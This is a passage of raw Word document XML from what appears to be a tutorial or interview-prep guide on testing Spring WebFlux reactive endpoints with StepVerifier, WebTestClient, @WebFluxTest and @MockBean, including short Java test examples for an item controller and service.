          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Verifies that the stream completes without any errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180FF10B"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verify()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ends the test and performs all assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369EE4D3" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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4. Test the Controller Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD447A"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You can use @WebFluxTest to test your controller in isolation. This also involves mocking the service layer. In a typical WebFlux controller test, you would use WebTestClient for testing HTTP interactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8BD48" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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ontroller Layer Test with WebTestClient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64825F80"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junit.jupiter.api.BeforeEach;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896A45D"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junit.jupiter.api.Test;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C6F15"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mockito.Mock;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AE56AA"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F9007"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boot.test.autoconfigure.webflux.WebFluxTest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09850EF9"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boot.test.mock.mockito.MockBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C234C"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test.web.reactive.server.WebTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11030755"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Mono;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D10DC" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBC9E9E"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static org.mockito.Mockito.when;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181DCCF2" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A4C2692"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ebFluxTest(ItemController.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667093E4"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ControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E67E67" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308BF076"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0394BDCE"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WebTestClient webTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4240A1" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B6548E"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MockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D68D00"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC026F" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F26101A"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42447CA1"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void testGetItemById() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DF564"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Mock the service layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6BF36B"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hen(itemService.getItemById("1")).thenReturn(Mono.just(new Item("1", "Test Item", 100.0)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01660D8B" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43222D6A"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Perform the actual GET request using WebTestClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113523E3"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ebTestClient.get().uri("/api/items/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE7B61"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change()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C00FC1"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pectStatus().isOk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51293EF2"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pectBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660AFF8"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jsonPath("$.id").isEqualTo("1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364B7FB5"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jsonPath("$.name").isEqualTo("Test Item");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F0897"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03A9476D" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1025C76A"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145FE46F"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void testGetItemByIdNotFound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCB2F45"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hen(itemService.getItemById("unknown")).thenReturn(Mono.empty());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E145B4" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3BE9D9"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ebTestClient.get().uri("/api/items/unknown")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44871368"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change()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D005413"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pectStatus().isNotFound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A627D4"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6152E26E"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43C57DD0" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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Key Concepts in Controller Test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7864F7"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WebTestClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A client to simulate HTTP requests for testing WebFlux controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C60762"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MockBean</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to mock beans in the application context, like the service layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13162886"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jsonPath()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to verify specific fields in the returned JSON response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541D6210" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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5. Handling Errors in Reactive Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0647E14C"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or error handling in reactive streams, you can test if your service is correctly handling errors, such as validation or database connection errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9AE027"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xample of testing error handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695ECD7"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABE88C"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void testErrorHandling() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0500AC"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 xml:space="preserve">    Mono&lt;Item&gt; result = itemService.getItemById("invalid");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F7C112" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB6894F"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tepVerifier.create(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE7744"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pectError(ItemNotFoundException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F21DD5"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verify();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786F3BB5"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5E528BF5" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C1"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD023ED"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esting in </w:t>
      </w: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xml:space="preserve"> involves using Mono and Flux along with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify the behavior of reactive streams. You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>StepVerifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test Mono and Flux in isolation, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebTestClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to test the full HTTP interaction of the controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF007C" w14:textId="77777777" w:rsidR="00FC73C1" w:rsidRPr="00B13F85" w:rsidRDefault="00FC73C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By testing both the service and controller layers, you can ensure that your reactive web application behaves as expected under various conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE670D5"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131B707">
          <v:rect id="_x0000_i2330" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65835A3E" w14:textId="1370BFA1"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27" w:name="_Toc196308007"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which tools or strategies would you use for testing reactive endpoints</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="527"/>
    </w:p>
    <w:p w14:paraId="69815EC1" w14:textId="156F813D" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0"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esting </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w: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xml:space="preserve"> involves several strategies and tools that are designed to handle asynchronous, non-blocking operations. Here's a list of tools and strategies that can be used for testing reactive endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231D0D86" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 WebTestClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9C8760"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ebTestClient is a non-blocking, reactive client used for testing Spring WebFlux controllers. It simulates HTTP requests to test your RESTful endpoints. It's similar to TestRestTemplate, but it's specifically designed for reactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C024279" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBCD234"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upports both synchronous and asynchronous HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD90236"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Can verify the response status, body, headers, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2336ABFC"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Can be used to test controllers in isolation without needing to start the full application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03709846" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E71FA"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B72E4F"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rivate WebTestClient webTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E783FCD" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="563470AA"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D317C1"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void testGetItem() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21431378"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ebTestClient.get().uri("/api/items/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E9998"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change()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53671C22"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pectStatus().isOk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AF1BDE"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pectBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCF37C"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jsonPath("$.id").isEqualTo("1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A59BBC"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jsonPath("$.name").isEqualTo("Test Item");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A546445"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12979744" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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2. StepVerifier (from Reactor Test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92CA44"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tepVerifier is a testing utility provided by the Reactor framework (which underlies Spring WebFlux) for verifying the behavior of reactive types like Mono and Flux. It provides an easy way to assert that reactive streams emit the correct values or handle errors as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0666863F" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2638D5D0"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llows you to verify the emitted elements in a reactive stream (Mono or Flux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6F4581"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upports verifying the completion or errors in the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CA67DD"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Helps simulate and test how data is emitted asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF68D1" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14650A79"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034F70B1"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void testGetItemById() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A2FAA3"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Mono&lt;Item&gt; itemMono = itemService.getItemById("1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C760BDF" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B22D85"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tepVerifier.create(itemMono)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09893A69"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pectNextMatches(item -&gt; item.getId().equals("1"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092819E"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pectComplete()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83826F"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verify();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332FB5DD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860BB72" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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3. @WebFluxTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4203EE4A"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ebFluxTest is a specialized annotation used for testing only the web layer (i.e., controllers) in Spring WebFlux applications. It loads the controller and other web-related components, but it doesn't start the full application context. You can use @MockBean to mock service or repository layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9599C" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F8F83"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oads only WebFlux-related components, which makes it faster for testing web endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23416644"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asily mock services or repositories with @MockBean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFCF1BB"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deal for controller tests in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D26128" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E62DA5"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ebFluxTest(ItemController.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E720548"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ControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37417C0A" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66406026"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB58DCF"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WebTestClient webTestClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260E2FA4" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09468092"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MockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF1A48"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6033AA" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAAF62B"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B2C1BC"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void testGetItemById() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBF3BB7"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hen(itemService.getItemById("1")).thenReturn(Mono.just(new Item("1", "Test Item", 100.0)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F629CF8" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452CA67E"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ebTestClient.get().uri("/api/items/1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFC05CA"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change()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B77044D"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pectStatus().isOk()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FECE9B9"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pectBody()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF1954"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jsonPath("$.id").isEqualTo("1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B6B0E"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jsonPath("$.name").isEqualTo("Test Item");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0316D321"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1DAE40B4"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40F4F736" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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4. @MockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC977B"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ockBean is used in combination with @WebFluxTest to mock dependencies like services or repositories. This is useful when you want to isolate the web layer and not invoke real service or repository logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0BFA63" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC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 Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C91845B"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ebFluxTest(ItemController.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F491D"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ControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F49DE6" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="275A5B85"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MockBean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075C46C"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ItemService itemService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD4B89" w14:textId="77777777" w:rsidR="00215CC0" w:rsidRPr="00B13F85" w:rsidRDefault="00215CC0" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20479A9E"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76035CB0"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void testGetItemById() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A07BC1A"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hen(itemService.getItemById("1")).thenReturn(Mono.just(new Item("1", "Test Item", 100.0)));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C82E81"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Test with WebTestClient</w:t>
      </w:r>
    </w:p>
